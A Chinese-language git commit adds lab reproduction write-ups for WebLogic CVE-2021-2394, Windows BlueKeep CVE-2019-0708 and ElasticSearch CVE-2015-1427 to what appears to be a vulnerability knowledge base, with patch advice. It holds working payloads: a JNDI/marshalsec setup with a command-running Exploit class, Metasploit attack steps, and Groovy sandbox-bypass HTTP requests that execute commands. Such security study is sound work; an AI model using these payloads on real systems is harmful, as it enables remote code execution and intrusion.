更新漏洞

2025-11-05 10:50:23 +00:00 · 2023-03-28 17:48:31 +08:00 · 2023-03-28 17:48:31 +08:00 · 886c5bb019
commit 886c5bb019
parent 4183968483
11 changed files with 242 additions and 0 deletions
--- a/README.md
+++ b/README.md
@ -448,6 +448,7 @@
  * Weblogic SSRF漏洞 CVE-2014-4210
  * WebLogic T3 反序列化漏洞 CVE-2016-3510
  * Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271
+  * Weblogic 二次反序列化漏洞 CVE-2021-2394
  * Weblogic 反序列化远程代码执行漏洞 CVE-2019-2725
  * Zabbix SAML身份绕过漏洞 CVE-2022-23131
 - 云安全漏洞
@ -455,6 +456,7 @@
  * K8s API Server未授权命令执行
 - 其他漏洞

+  * Microsoft Word 远程代码执行漏洞 CVE-2023-21716
  * 微信客户端 远程命令执行漏洞
 - 开发框架漏洞

@ -491,10 +493,12 @@
  * Windows SMB远程代码执行漏洞 CVE-2020-0796
  * Windows Win32k 内核提权漏洞 CVE-2022-21882
  * Windows Win32k 本地提权漏洞 CVE-2021-1732
+  * Windows远程桌面服务漏洞 CVE-2019-0708
 - 服务器应用漏洞

  * ClickHouse API 数据库接口未授权访问漏洞
  * Consul Docker images 空密码登录漏洞 CVE-2020-29564
+  * ElasticSearch Groovy 沙盒绕过 & 代码执行漏洞 CVE-2015-1427
  * Elasticsearch 未授权访问
  * Franklin Fueling Systems tsaupload.cgi 任意文件读取漏洞 CVE-2021-46417
  * Git for Visual Studio远程执行代码漏洞 CVE-2021-21300
--- a/Web服务器漏洞/Weblogic
+++ b/Web服务器漏洞/Weblogic
@ -0,0 +1,80 @@
+# Weblogic 二次反序列化漏洞 CVE-2021-2394
+
+## 漏洞描述
+
+Oracle官方发布了2021年7月份安全更新通告，通告中披露了WebLogic组件存在高危漏洞，攻击者可以在未授权的情况下通过IIOP、T3协议对存在漏洞的WebLogic Server组件进行攻击。成功利用该漏洞的攻击者可以接管WebLogic Server。
+
+这是一个二次反序列化漏洞，是CVE-2020-14756和CVE-2020-14825的调用链相结合组成一条新的调用链来绕过weblogic黑名单列表。
+
+## 漏洞影响
+
+```
+Oracle WebLogic Server 10.3.6.0.0
+Oracle WebLogic Server 12.1.3.0.0
+Oracle WebLogic Server 12.2.1.3.0
+Oracle WebLogic Server 12.2.1.4.0
+Oracle WebLogic Server 14.1.1.0.0
+```
+
+## 环境搭建
+
+系统环境：window10 系统
+
+weblogic 版本：12.2.1.3，官网下载
+
+![image-20230328155039160](images/image-20230328155039160.png)
+
+在当前目录启动，启动后访问：
+
+![image-20230328155131145](images/image-20230328155131145.png)
+
+## 漏洞复现
+
+下载 marshalsec 利用 marshalsec 开启 JNDI 服务：
+
+```
+https://github.com/mbechler/marshalsec # 需要自己编译
+mvn clean package –DskipTests
+
+https://github.com/RandomRobbieBF/marshalsec-jar # 可以直接使用
+```
+
+创建 Exploit.java，通过 javac 编译得到 Exploit.class：
+
+```
+public class Exploit {
+
+    static {
+        System.err.println("Pwned");
+        try {
+            String cmds = "calc";
+            Runtime.getRuntime().exec(cmds);
+        } catch ( Exception e ) {
+            e.printStackTrace();
+        }
+    }
+}
+```
+
+在同目录下使用 python 开启一个 http 服务，并使用 marshalsec 开启 JNDI 服务：
+
+```
+python -m http.server 8000
+java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8000/#Exploit" 8087
+```
+
+使用exp进行复现：
+
+- https://github.com/lz2y/CVE-2021-2394/releases/tag/2.0
+
+```
+java -jar CVE_2021_2394.jar 192.168.31.3 7001 ldap://192.168.3.35:8087/Exploit
+```
+
+![image-20230328155325277](images/image-20230328155325277.png)
+
+## 修复方式
+
+当前官方已发布受影响版本的对应补丁，建议受影响的用户及时更新官方的安全补丁。链接如下：
+
+- https://www.oracle.com/security-alerts/cpuapr2021.html
--- a/Web服务器漏洞/images/image-20230328155039160.png
+++ b/Web服务器漏洞/images/image-20230328155039160.png
--- a/Web服务器漏洞/images/image-20230328155131145.png
+++ b/Web服务器漏洞/images/image-20230328155131145.png
--- a/Web服务器漏洞/images/image-20230328155325277.png
+++ b/Web服务器漏洞/images/image-20230328155325277.png
--- a/操作系统漏洞/Windows远程桌面服务漏洞
+++ b/操作系统漏洞/Windows远程桌面服务漏洞
@ -0,0 +1,83 @@
+# Windows远程桌面服务漏洞 CVE-2019-0708
+
+## 漏洞描述
+
+2019年5月14日，微软发布了针对远程桌面服务的关键远程执行代码漏洞CVE-2019-0708的补丁，该漏洞影响某些旧版本的Windows。攻击者一旦成功触发该漏洞，便可以在目标系统上执行任意代码，该漏洞的触发无需任何用户交互操作。这就意味着，存在漏洞的计算机只要联网，无需任何操作，就可能遭遇黑客远程攻击，运行恶意代码。其方式与2017年WannaCry恶意软件的传播方式类似。成功利用此漏洞的攻击者可以在目标系统完成安装应用程序，查看、更改或删除数据，创建完全访问权限的新账户等操作。 
+
+## 漏洞影响
+
+该漏洞影响旧版本的Windows系统，包括：
+
+```
+Windows 7
+Windows Server 2008 R2
+Windows Server 2008
+Windows 2003
+Windows XP
+```
+
+Windows 8和Windows 10及之后版本不受此漏洞影响。
+
+## 漏洞复现
+
+测试环境：
+
+![image-20230328160605922](images/image-20230328160605922.png)
+
+将下载的exp分别放入或替换：
+
+```
+/usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
+
+/usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
+
+/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
+```
+
+升级msf：
+
+- 使用命令msfupdate，按提示，apt update
+
+- apt install Metasploit-framework，最后reload_all
+
+启动Metasploit，用search搜索0708，使用use exploit/windows/rdp/cve_2019_0708_bluekeep_rce启用0708RDP模块攻击：
+
+![image-20230328160727201](images/image-20230328160727201.png)
+
+用show options进行参数设置
+
+这里只需要设置两项，set rhosts 目标ip(我这里是192.168.106.149)，以及set target 3
+
+set target ID数字(可选为0-4)设置受害机机器架构，wmware=3，Virtualbox=2
+
+![image-20230328160741117](images/image-20230328160741117.png)
+
+成功利用。
+
+到目前公开的利用代码可用于攻击 Windows 7 SP1 x64 与 Windows 2008 R2 x64的EXP不太稳定，针对 Windows 7 SP1 x64攻击有蓝屏现象。
+
+复现过程中出现的一些问题解决方法：
+
+如提示Exploit failed: NameError undefined local variable or method `rdp_connect' for，则需要替换下载的exp（4个rb文件）；
+
+如提示ForceExploit错误，需要将ForceExploit设置为true；
+
+Windows2008 R2 x64 需要修改[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TerminalServer\WinStations\rdpwd\fDisableCam]值为0。
+
+## 漏洞修复
+
+安装微软的安全更新来给系统打上安全补丁：
+
+- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708
+
+同时针对已不受微软更新支持的系统Windows Server 2003和Windows XP提供的安全更新，下载地址:
+
+- https://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708
+
+**缓解措施（在无法及时安装微软安全更新的情况下作为临时性解决方案）**
+
+1.若用户不需要用到远程桌面服务，建议禁用该服务。
+
+2.开启网络级别身份验证（NLA），此方案适用于Windows 7, Windows Server 2008, Windows Server 2008 R2。
+
+以上措施只能暂时性针对该漏洞对系统进行部分缓解，强烈建议在条件允许的情况下及时安装微软安全更新。
--- a/操作系统漏洞/images/image-20230328160605922.png
+++ b/操作系统漏洞/images/image-20230328160605922.png
--- a/操作系统漏洞/images/image-20230328160727201.png
+++ b/操作系统漏洞/images/image-20230328160727201.png
--- a/操作系统漏洞/images/image-20230328160741117.png
+++ b/操作系统漏洞/images/image-20230328160741117.png
--- a/服务器应用漏洞/ElasticSearch
+++ b/服务器应用漏洞/ElasticSearch
@ -0,0 +1,75 @@
+# ElasticSearch Groovy 沙盒绕过 & 代码执行漏洞 CVE-2015-1427
+
+## 漏洞描述
+
+CVE-2014-3120后，ElasticSearch默认的动态脚本语言换成了Groovy，并增加了沙盒，但默认仍然支持直接执行动态语言。本漏洞：1.是一个沙盒绕过； 2.是一个Goovy代码执行漏洞。
+
+参考文章：
+
+- http://cb.drops.wiki/drops/papers-5107.html
+- http://jordan-wright.com/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/
+- https://github.com/XiphosResearch/exploits
+- http://cb.drops.wiki/drops/papers-5142.html
+
+**Groovy语言“沙盒”**
+
+ElasticSearch支持使用“在沙盒中的”Groovy语言作为动态脚本，但显然官方的工作并没有做好。lupin和tang3分别提出了两种执行命令的方法：
+
+1. 既然对执行Java代码有沙盒，lupin的方法是想办法绕过沙盒，比如使用Java反射
+2. Groovy原本也是一门语言，于是tang3另辟蹊径，使用Groovy语言支持的方法，来直接执行命令，无需使用Java语言
+
+所以，根据这两种执行漏洞的思路，我们可以获得两个不同的POC。
+
+Java沙盒绕过法：
+
+```
+java.lang.Math.class.forName("java.lang.Runtime").getRuntime().exec("id").getText()
+```
+
+Goovy直接执行命令法：
+
+```
+def command='id';def res=command.execute().text;res
+```
+
+## 漏洞复现
+
+jre版本：openjdk:8-jre
+
+elasticsearch版本：v1.4.2
+
+由于查询时至少要求es中有一条数据，所以发送如下数据包，增加一个数据：
+
+```
+POST /website/blog/ HTTP/1.1
+Host: 192.168.44.132:9200
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 25
+
+{
+  "name": "test"
+}
+```
+
+然后发送包含payload的数据包，执行任意命令：
+
+```
+POST /_search?pretty HTTP/1.1
+Host: 192.168.44.132:9200
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Type: application/text
+Content-Length: 156
+
+{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}
+```
+
+结果如图所示：
+
+![image-20230328161241539](images/image-20230328161241539.png)
--- a/服务器应用漏洞/images/image-20230328161241539.png
+++ b/服务器应用漏洞/images/image-20230328161241539.png